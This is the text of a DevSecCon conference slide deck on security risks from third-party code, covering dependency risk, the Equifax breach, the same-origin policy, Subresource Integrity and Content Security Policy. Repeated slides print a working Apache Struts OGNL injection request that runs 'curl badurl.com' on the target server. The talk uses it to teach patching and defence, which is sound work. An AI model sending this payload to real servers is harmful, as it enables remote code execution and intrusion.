Join the conversation #DevSecCon

BY TIM KADLEC @TKADLEC

Their Problems Are Your Problems

THEIR PROBLEMS AREYOUR PROBLEMS

Tim Kadlec | @tkadlec

HELL IS OTHER PEOPLE’S CODECODE

CODE

CODE

CONTEXT

OPINIONS

ASSUMPTIONS

WEB IS POWERED BY OTHER PEOPLE’S CODE

9 MILLION Different Users

28% More artifacts indexed in past year

23,411,471 Packages downloaded per month

HUGE BOOST FOR PRODUCTIVITY

1,000 DEPENDENCIES

1,000 DEPENDENCIES~5 CONTRIBUTORS

1,000 DEPENDENCIES~5 CONTRIBUTORS

5,000 DEVELOPERS

5,000 DEVELOPERS

OFFLOAD THE WORK But not the

RISK

OFFLOAD THE WORK But not the

RESPONSIBILITY

http://bit.ly/struts-vuln

http://bit.ly/snyk-struts

curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"

curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"

curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"

public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { ... if (content_type != null && content_type.contains("multipart/form-data")) { ... request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); }

return request; }

public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { ... if (content_type != null && content_type.contains("multipart/form-data")) { ... request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); }

return request; }

public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { ... if (content_type != null && content_type.contains("multipart/form-data")) { ... request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); }

return request; }

String errorMessage = buildErrorMessage(e, new Object[]{e.getPermittedSize(), e.getActualSize()});

curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"

MARCH 6: FIXED VERSION RELEASED MARCH 7: EXPLOIT SCRIPTS APPEAR MAY 13-JULY 30: EQUIFAX BREACH SEPTEMBER 7: BREACH ANNOUNCED

0

225

450

675

900

2007 2008 2009 2010 2011 2012 2013 2014 2015 2016 2017

OPEN-SOURCE LIBRARY VULNS BY YEAR

The human error was that the individual who’s responsible for communicating in the organization to apply the patch, did not.

“

EVERYONE’S RESPONSIBILITY

LAYERS OF DEFENSE

77% USE A VULNERABLE JS LIBRARY

http://bit.ly/lh-audit

http://bit.ly/sonarwhal

~35% Third-Party Resources

(2013)2013

2013

2013

2013

2013 2017

2013 2017~53% Third-Party Resources

77-99% Third-Party Resources

38% of sites

SAME-ORIGIN POLICY

ORIGIN: SCHEME + HOSTNAME + PORT

http://foo.com/index.html

http://foo.com/index.htmlhttp://scheme

http://foo.com/index.htmlfoo.comscheme host

http://foo.com/index.htmlscheme host

port implied, 80

http://foo.com/index.html

http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:80/about.html

http://foo.com/index.html

http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:80/about.html

http://foo.com/index.html

http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html

http://foo.com/index.html

http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html

http://foo.com/index.html

http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html

http://foo.com/index.html

http://foo.com/about.html https://foo.com/index.html http://a.foo.com/about.html http://foo.com:81/about.html

--disable-web-security

about:blank

javascript:

var xhr = new XMLHttpRequest(); xhr.open('GET', "https://www.devseccon.com/"); xhr.send();

<script src=“..."></script>

<img src="..." />

<link href="..." />

SUBRESOURCE INTEGRITY

<script src="https://foo.com/framework.js" integrity=“sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"> </script>

<script src="https://foo.com/framework.js" integrity=“sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"> </script>

CONTENT SECURITY POLICY (CSP)

SAME-ORIGIN POLICY?

WHITELIST

Content-Security-Policy: policy;

Content-Security-Policy: resource-directive source-list;

Content-Security-Policy: script-src ‘self’ https://apis.google.com;

base-uri child-src connect-src font-src form-action frame-ancestors img-src

media-src object-src plugin-types report-uri style-src script-src upgrade-insecure-requests

Content-Security-Policy: default-src ‘self’;

none self unsafe-inline unsafe-eval

Content-Security-Policy: default-src 'self'; script-src ‘nonce-2726c7f26c'

<script nonce="2726c7f26c"> alert(123); </script>

Content-Security-Policy: script-src 'sha256-cLuU6nVzrYJlo7rUa6PFrPQrEUpOHllb5ic='

Content-Security-Policy-Report-Only:

CONTENT-SECURITY-POLICY: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.gravatar.com *.wp.com *.githubusercontent.com; media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com

Content-Security-Policy-Report-Only: default-src https:; form-action https:; report-uri https://myreport.com;

Content-Security-Policy: default-src https:; form-action https:; report-uri https://myreport.com;

CONTENT-SECURITY-POLICY: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.gravatar.com *.wp.com *.githubusercontent.com; media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com

SERVERLESS & PAAS

UNPATCHED SERVERS

COMPROMISED SERVERS

WHAT’S THE PATH OF LEAST RESISTANCE?

http://bit.ly/bucket-finder

SECURE BY DEFAULT

OFFLOAD THE WORK But not the

RESPONSIBILITY

REAL PEOPLE PAYING THE PRICE

http://bit.ly/owasp-cloud

SYSTEM CONFIGURATION NETWORK LAYER FRONT-END CODE BACK-END COMPONENTS THIRD-PARTY SERVICES

LAYERS OF DEFENSE

EVERYONE’S RESPONSIBILITY

BRING SECURITY TO THE TEAM

WEB IS POWERED BY OTHER PEOPLE’S CODE

WEB’S SAFETY & STABILITY

IS UP TO US

Join the conversation #DevSecCon

Thank you!Tim Kadlec | @tkadlec